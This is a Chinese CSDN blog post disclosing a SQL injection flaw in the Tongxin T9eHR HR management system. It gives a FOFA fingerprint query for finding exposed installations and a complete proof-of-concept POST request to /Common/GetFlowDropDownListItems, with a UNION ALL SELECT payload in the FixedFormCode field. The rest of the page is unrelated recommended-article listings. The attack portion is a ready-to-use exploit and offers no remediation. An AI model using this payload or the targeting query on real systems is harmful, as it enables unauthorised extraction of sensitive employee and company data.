同鑫T9eHR信息华管理系统GetDropDownListItems存在SQL注入漏洞

最新推荐文章于 2024-08-27 16:09:26 发布
最新推荐文章于 2024-08-27 16:09:26 发布
阅读量105 收藏
点赞数 1
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/141599849
版权

漏洞描述:

广州同鑫科技有限公司是专业从事人力资源管理系统、eHR/OA一体化智慧云平台、智慧一卡通云平台、行业软件开发与定制、智慧企业管理信息化咨询与项目服务为核心业务的顾问式管理咨询和软件个性定制开发的高科技股份集团公司。广州同鑫科技有限公司同鑫T9eHR信息华管理系统GetDropDownListItems存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

 

FOFA:

body="T9eHR"

漏洞复现 

POC:

POST /Common/GetFlowDropDownListItems HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 33

FixedFormCode=1%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28109%29%2BCHAR%28107%29%2BCHAR%2886%29%2BCHAR%2897%29%2BCHAR%2897%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2879%29%2BCHAR%28111%29%2BCHAR%2898%29%2BCHAR%2871%29%2BCHAR%2871%29%2BCHAR%2876%29%2BCHAR%2865%29%2BCHAR%2868%29%2BCHAR%28103%29%2BCHAR%2880%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%2871%29%2BCHAR%28114%29%2BCHAR%2898%29%2BCHAR%2873%29%2BCHAR%28112%29%2BCHAR%28115%29%2BCHAR%2882%29%2BCHAR%28112%29%2BCHAR%28116%29%2BCHAR%2889%29%2BCHAR%28120%29%2BCHAR%2884%29%2BCHAR%28104%29%2BCHAR%2881%29%2BCHAR%28121%29%2BCHAR%28119%29%2BCHAR%28108%29%2BCHAR%28117%29%2BCHAR%28111%29%2BCHAR%28120%29%2BCHAR%28117%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28113%29--+AHRN

sqlmap:

 

马船长
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
同鑫T9eHR信息管理系统SQL注入漏洞
weixin_43167326的博客
08-27 473
广州同鑫科技有限公司是专业从事人力资源管理系统eHR/OA一体化智慧云平台、智慧一卡通云平台、行业软件开发与定制、智慧企业管理信息化咨询与项目服务为核心业务的顾问式管理咨询和软件个性定制开发的高科技股份集团公司。广州同鑫科技有限公司同鑫T9eHR信息管理系统GetDropDownListItems存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息
漏洞复现】同享人力资源管理系统-TXEHR V15 EmployeeInfoService.asmx SQL注入漏洞
weixin_45790890的博客
08-12 624
同享人力资源管理系统(TXEHR V15)是一款专为现代企业设计的人力资源管理软件解决方案,旨在通过先进的信息化手段提升企业人力资源管理的效率与水平。该系统集成了组织人事、考勤管理、薪资核算、招聘配置、培训发展、绩效管理等核心模块,并提供了灵活的配置选项和强大的数据分析能力,以满足不同企业规模和行业特性的需求。
企业为什么需要企业人力管理信息系统实现人力资源自动化?
tongxinehr的博客
10-15 123
在市场激烈的竞争压力下,信息化管理成为现代企业的转型趋势,目前很多企业都不惜耗费时间精力和成本上线企业人力管理信息系统,那企业为什么需要企业人力管理信息系统实现人力资源自动化? 传统的人力资源管理模式效率低下,企业要想保持高速平稳发展,必定需要一个高效强大的人力资源部门做后盾,保持企业的正常管理运营和持续为公司提供优秀人才,所以需要HR系统实现人力资源管理自动化: 自动化入职流程: 新员工入职的工作包含了许许多多,例如制作入职表格、劳动和薪资合同、IT系统分配以及新员工培训等等,大量的人员入职会耗费大量的
IT信息化厂商
热门推荐
hzp666的博客
12-31 6万+
这是软件厂商公司名单库(20201116更新版),希望能给软件圈、关注软件圈的朋友,提供一个可参考的文档。 以下enjoy~ 1、ERP厂商 sap、oracle、赛捷(sage)、用友、金蝶、鼎捷、神州数码、浪潮、新中大、东软、中软、宝信软件、博科、天元国信、微软、正航软件、管家婆、金算盘、管易、智邦国际、德米萨、通易、精效ERP、万里牛懒人ERP、来钱快速达、任我行、美萍、精算软件、艾特、快普、商友、东软件、高格ERP、汉得信息、哲霖软件、九天软件、网店管家、吉客云 2...
那些SAP项目里的主流外围系统
喜欢打酱油的老鸟
08-23 3681
做过大公司SAP项目的同行们都知道,很多大公司尤其是哪些世界500强的跨国企业的IT系统很多。即使企业实施了SAP ERP系统并将其作为核心战略平台,也不能将那些IT系统全部替换掉。因此这造成了在核心的SAP系统以外,还有很多外围系统并存,并且部分的外围系统与SAP系统有接口的情况。
ehr系统有哪些品牌,ehr系统十大排名!
tongxinehr的博客
08-23 217
同鑫科技专注国内人力资源信息化建设24年,全国多地有分公司,在珠三角和长三角积累了大量制造企业和集团企业的成功经验,并有很多日资、台资、美资、港资、德资等企业案例,在制造业中有着十分明显的优势,而且产品功能强大、易用性突出、稳定性良好,功能涵盖组织人事、考勤薪酬、招聘、绩效、培训、行政后勤等18个模块,覆盖员工选、用、育、留、汰全流程,还提供人才发展、人力资源规划等进阶功能,可提供定制和二次开发支持。以上都国内比较好用的人力资源系统软件推荐,不同厂商有着其自身特点和优势领域,企业要根据需求进行合适选择。
OA与EHR系统集成方案
明德至善 博学笃行
01-20 1743
项目介绍
制造业人力资源薪酬管理系统能够解决那些问题?
tongxinehr的博客
10-20 413
制造业工厂是劳动密集型企业,是需要依靠大量的工人进行生产,人员越多对企业的管理考验就越大,所以信息化管理是制造业必然的趋势,那制造业人力资源薪酬管理系统要能够为企业解决那些问题? 制造工厂人员复杂,其面临的管理问题有很多,而且像考勤、薪资、计件等方面的问题是急需要解决的,所以解决以下问题是人力资源系统的重要作用: 1、考勤问题 员工考勤是制造企业最为核心的管理手段,虽然很多工厂都会通过考勤机来进行简单的管理,但这种方式考勤打卡效率低下,而且亦容易产生代打情况,考勤数据统计亦都费时费力。而且很多工厂是采用多
HW漏洞威胁情报第三十五天|HW情报
weixin_43167326的博客
08-26 385
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
1.4 Golang in GrabFood Discovery System@温同鑫.pdf
09-13
6. **包和模块管理**:Go语言通过`go mod`命令提供模块化管理,方便项目的依赖管理和版本控制。 在GrabFood的Discovery系统中,Golang可能被用来构建高可用的后端服务,处理大量的请求,并进行高效的路由和数据检索...
同鑫煤矿应急救援演习总结.doc
02-14
同鑫煤矿应急救援演习总结.doc
宝马5系加装原厂B&O顶级环绕音响系统.pdf
11-16
【宝马5系加装原厂B&O顶级环绕音响系统】是针对宝马5系车型进行的一项高级音响升级方案,旨在为车主带来卓越的音乐享受。该系统由丹麦著名音响品牌Bang & Olufsen(B&O)设计制造,以其高质量和创新技术闻名于世。 ...
SQL统计行数的语句
曹昆的技术博客
08-27 93
SQL 中,你可以使用 COUNT() 函数来统计查询结果的行数。这个函数可以用在不同的上下文中,具体取决于你想要统计的内容。
漏洞披露-金慧-综合管理信息系统-SQL
最新发布
无问社区的博客
08-27 225
金慧数据资产管理平台是一款企业级数据资产管理软件,其基于先进的技术架构,具备操作简单、部署灵活、快速响应等特点。由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
数据库查询大量数据避免内存溢出的方法
huan1213858的博客
08-23 261
每次查询一定数量数据之后记录id,进行数据处理之后再继续查询继续处理,
SQL】关注者数量
Frost_Descent的博客
08-23 557
(user_id, follower_id) 是这个表的主键(具有唯一值的列的组合)。count计数,count(follower_id) followers_count。该表包含一个关注关系中关注者和用户的编号,其中关注者关注用户。使用order by升序排列order by user_id。编写解决方案,对于每一个用户,返回该用户的关注者数量。按照用户id分组,group by user_id。查询结果的格式如下示例所示。2 的关注者有 {0,1}0 的关注者有 {1}1 的关注者有 {0}
出现Property ‘sqlSessionFactory‘ or ‘sqlSessionTemplate‘ are requiredProperty报错
m0_74436895的博客
08-23 724
SpringBootApplication,它组合了@Configuration, @EnableAutoConfiguration, 和 @ComponentScan注解的功能。我在使用一个验证码生成的工具asy-captcha库的验证码接口遇到javax.script.ScriptEngine.eval调用失败的问题,因为engine为null。1.启动类 里配置的 (@MapperScan(“com.example.demo.dao.mapper”)),这里开始配置错了。n若有添加,尝试删除。
SQL进阶技巧:如何按任意时段分析时间区间问题? | 分区间讨论【左、中、右】
石榴姐yyds
08-23 134
本文分析了一种按任意时段计算时间区间问题的方法和思路,其本质是区间重叠问题的应用,文中给出了两种方法,一种按照区间重叠的方式进行分情况讨论划分区间,找出重叠区间,并计算问题,一种按照区间展开的形式形成全量的明细表,基于明细表求解任意给定的时段统计问题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值